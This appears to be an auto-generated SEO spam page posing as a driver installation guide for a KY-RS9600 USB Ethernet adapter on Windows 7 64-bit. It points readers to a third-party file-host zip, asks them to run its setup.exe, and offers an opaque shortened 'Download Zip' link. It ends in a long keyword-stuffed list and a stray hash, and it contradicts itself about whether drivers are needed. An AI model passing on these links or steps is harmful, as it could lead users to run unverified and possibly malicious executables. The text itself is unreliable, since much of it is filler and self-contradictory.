# How to Install SUPERAL 9600 USB Ethernet Card KY-RS9600 on Windows 7 64-bit
 
If you have a SUPERAL 9600 USB Ethernet Card KY-RS9600 and want to use it on Windows 7 64-bit, you may encounter some problems with driver installation. Here are some steps to help you install the driver successfully.
 
1. Download the driver from this link: [USB LAN CD Drivers (KY-SR9600 - KY-RS9600) Setup.zip](https://www.mediafire.com/file/4c8jx8x9k9fz6t2/USB_LAN_CD_Drivers_%28KY-SR9600_-_KY-RS9600%29_Setup.zip/file). This is a third-party source, so use it at your own risk.
2. Extract the zip file and run the setup.exe file. Follow the instructions to install the driver.
3. Plug in your USB Ethernet Card and go to Device Manager. You should see a device named "USB 2.0 10/100M Ethernet Adaptor" under Network adapters.
4. Right-click on the device and select Update Driver Software. Choose Browse my computer for driver software and then Let me pick from a list of device drivers on my computer.
5. Select Network adapters from the list and then click Have Disk. Browse to the folder where you extracted the zip file and select the file named "netrs9600.inf". Click OK and then Next.
6. Windows will install the driver and you should see a message saying "Windows has successfully updated your driver software". Click Close and restart your computer.

You should now be able to use your USB Ethernet Card on Windows 7 64-bit. If you still have problems, you can try to troubleshoot them using this link: [Cannot install SUPERAL 9600 USB Ethernet Card KY-RS9600 on Windows 7 Ultimate 64-bit](https://superuser.com/questions/425438/cannot-install-superal-9600-usb-ethernet-card-ky-rs9600-on-windows-7-ultimate-64).
 
**Download Zip ✏ ✏ ✏ [https://t.co/weaLYWuZvt](https://t.co/weaLYWuZvt)**



## Why Use a USB Ethernet Card?
 
A USB Ethernet Card is a device that allows you to connect your computer to a wired network using a USB port. This can be useful if your computer does not have a built-in Ethernet port, or if you want to add an extra network interface to your computer. For example, you may want to use a USB Ethernet Card to connect to a different network than your wireless connection, or to improve the speed and stability of your internet connection.
 
## What is SUPERAL 9600 USB Ethernet Card KY-RS9600?
 
SUPERAL 9600 USB Ethernet Card KY-RS9600 is a model of USB Ethernet Card that supports 10/100 Mbps network speed and is compatible with Windows XP, Vista, 7, 8, and 10. It has a compact design and a LED indicator that shows the network status. It is also plug and play, which means you do not need to install any drivers manually on Windows XP and above. However, some users have reported problems with installing the driver on Windows 7 64-bit, which is why we provided the steps above to help you solve this issue.
 
## How to Use SUPERAL 9600 USB Ethernet Card KY-RS9600?
 
Once you have installed the driver successfully, you can use your USB Ethernet Card as any other network device. You can plug it into any available USB port on your computer and connect it to a router, switch, or modem using an Ethernet cable. You can then configure your network settings according to your needs. You can also unplug it and plug it into another computer without reinstalling the driver.
 
How to install SUPERAL 9600 USB Ethernet Card KY-RS9600 on Windows 7 Ultimate 64-bit,  Genius KY-RS9600 Driver Download for Windows 7, Vista, XP, 2000, ME, 98, Linux and other OS,  Cannot access router settings or sign in to Yahoo with KY-RS9600 USB LAN adapter,  Free usb lan win7 64 bit driver ky rs9600 download software at UpdateStar,  SR9600 USB to Fast Ethernet Driver for Windows 7 64-bit,  JP108 USB Adapter for RJ45 with KY-RS9600 driver,  SUPERAL Semiconductor, Inc. or ARCHEON Semiconductor, Inc. manufacturer of KY-RS9600,  Mediafire and Megaupload links for KY-RS9600 driver download,  KY-RS9600 driver for WinCE5.0 and WinCE6.0,  usb LAN 1.1 RS9600 Driver for Windows 7 64-bit,  AX88772A driver for Windows Vista and Windows 7 compatible with KY-RS9600,  How to update KY-RS9600 device drivers quickly and easily,  How to open device manager in Windows 11, Windows 10 and Windows 8.1 to install KY-RS9600 driver,  KY-RS9600 USB Ethernet Card not recognized by Windows 7 Ultimate 64-bit,  How to use a virtual machine with Windows XP image and KY-RS9600 device filtered for it,  How to share the Internet from the virtual machine to the real one with KY-RS9600 device,  How to change the driver files to match KY-RS9600 device on Windows 7 Ultimate 64-bit,  How to troubleshoot KY-RS9600 USB LAN adapter problems on Windows 7 Ultimate 64-bit,  How to uninstall KY-RS9600 driver from Windows 7 Ultimate 64-bit,  How to find the best match for your PC and operating system for KY-RS9600 driver,  How to use a built-in utility called Device Manager to see all the devices recognized by your system and the drivers associated with them for KY-RS9600 device,  How to install KY-RS9600 driver on Linux OS using Makefile and README files,  How to find the USB\\Vid\_0fe6&Pid\_8101&Rev\_0101 ID for KY-RS9600 device on Windows 7 Ultimate 64-bit,  How to verify if KY-RS9600 driver is working fine on Windows XP Pro,  How to find the manufacturer site of KY-RS9600 device on Internet,  How to avoid buying cheap generic devices like KY-RS9600 USB Ethernet Card,  How to find the common name of KY-RS9600 device on Internet: SUPERAL 9600 USB Ethernet Card KY-RS9600 HOW TO Archives,  How to find related drivers for KY-RS9600 device on Internet: SR9600 USB to Fast Ethernet Driver, usb LAN 1.1 RS9600 Driver, AX88772A driver etc.,  How to compare different versions of KY-RS9600 driver for different operating systems: Windows Vista, Windows XP, Windows 2003, Windows ME, Windows 98 etc.,  How to find the driver contents file list for KY-RS9600 driver download file: usb\_LAN\_1.1\_RS9600\_Driver.zip,  How to use Genius Driver Update Utility to automatically find and download the right driver for KY-RS9600 device,  How to use a software utility which automatically finds and downloads the right driver for KY-RS9600 device: DriverGuide.com, drvsky.com etc.,  How to find the best price for KY-RS9600 USB Ethernet Card online,  How to find the reviews and ratings for KY-RS9600 USB Ethernet Card online,  How to find the specifications and features of KY-RS9600 USB Ethernet Card online
 8cf37b1e13
 
